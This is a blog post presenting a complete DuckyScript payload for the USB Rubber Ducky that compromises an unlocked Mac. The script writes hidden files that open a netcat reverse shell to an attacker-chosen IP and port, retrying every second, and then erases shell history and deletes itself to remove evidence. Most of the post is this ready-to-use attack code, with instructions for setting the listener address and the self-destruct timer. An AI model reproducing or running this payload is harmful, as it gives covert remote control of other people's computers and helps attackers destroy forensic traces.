How to PWN a Mac in under 30 Seconds with the USB Rubber Ducky!

 

The USB Rubber ducky is an HID (Human Interface Device). Basically  its a programmable keyboard that can type way faster than any human that looks like a USB drive. And whats one major flaw in just about ALL operating systems? They trust the human.

 

There are many pre-written scripts available for windows. But not to many for OSX. I have a Mac, so that is what I generally write payloads for. This specific payload, will try to create a reverse shell every second, and after a pre-determined amount of time, will self-destruct leaving no evidence behind.

 

You might be thinking “Isn’t there already a reverse shell script for mac?”. Well yes, but I wasn’t satisfied with that one. It only initiates a connection when the computer boots, and doesn’t self  destruct. Mine, will try to connect to the host every second. The only downside to this, if the network is being monitored, it will create excessive noise.

NOTE: A solution to this, would be to add a “sleep #ofseconds” in the python code:

os.system(“clear; ./.script.sh”)

So it would look like this, which would try to initiate a connection every hour:

os.system(“sleep 3600; clear; ./.script.sh”)

 

REM AUTHOR: MICHAEL KETZNER
REM Creates a reverse shell and tries to initiate a connection every second
REM Change 127.0.0.1 to your IP and 8081 to your listening port
REM Change “STRING timeout = time.time() + 18000” change 518000 to the amount of seconds before self-destruction

DELAY 1000
DEFAULT_DELAY 100
COMMAND SPACE
DELAY 300
STRING TERMINAL
DELAY 300
ENTER
DELAY 3000
STRING rm .script.sh
ENTER
STRING touch .script.sh
ENTER
STRING echo “mkfifo foo” > .script.sh
ENTER
STRING echo “nc 127.0.0.1 8081 bin/bash 1>foo” >> .script.sh
ENTER
STRING chmod +rwx .script.sh
ENTER
STRING rm .clear.sh
ENTER
STRING touch .clear.sh
ENTER
STRING echo “open /Applications/Utilities/Terminal.app; sleep 1; osascript -e ‘tell application \”System Events\”‘ -e ‘keystroke \”q\” using command down’ -e ‘end tell’; rm .clear.sh” > .clear.sh;
ENTER
STRING chmod +rwx .clear.sh
ENTER
STRING rm .update.py
ENTER
STRING nano .update.py
ENTER
STRING import os
ENTER
STRING import time
ENTER
STRING timeout = time.time() + 18000
ENTER
STRING while True:
ENTER
STRING     os.system(“clear; ./.script.sh”)
ENTER
STRING     if time.time() > timeout:
ENTER
STRING         break
ENTER
STRING os.system(“rm ~/.bash_history; clear; history -c; clear”)
ENTER
STRING os.system(“clear”)
ENTER
STRING os.system(“rm .script.sh; rm .update.py; ./.clear.sh”)
ENTER
CTRL O
ENTER
CTRL X
STRING history -c
ENTER
STRING python .update.py
ENTER
COMMAND M
COMMAND H
DELAY 200
COMMAND SPACE
DELAY 200
DELETE
DELAY 200
COMMAND SPACE

Moral of the story, don’t leave your Mac unlocked when you leave. But even that can easily be defeated with this duckyscript. The only way to truly protect you mac, is to use full disk encryption.

 

About Michael David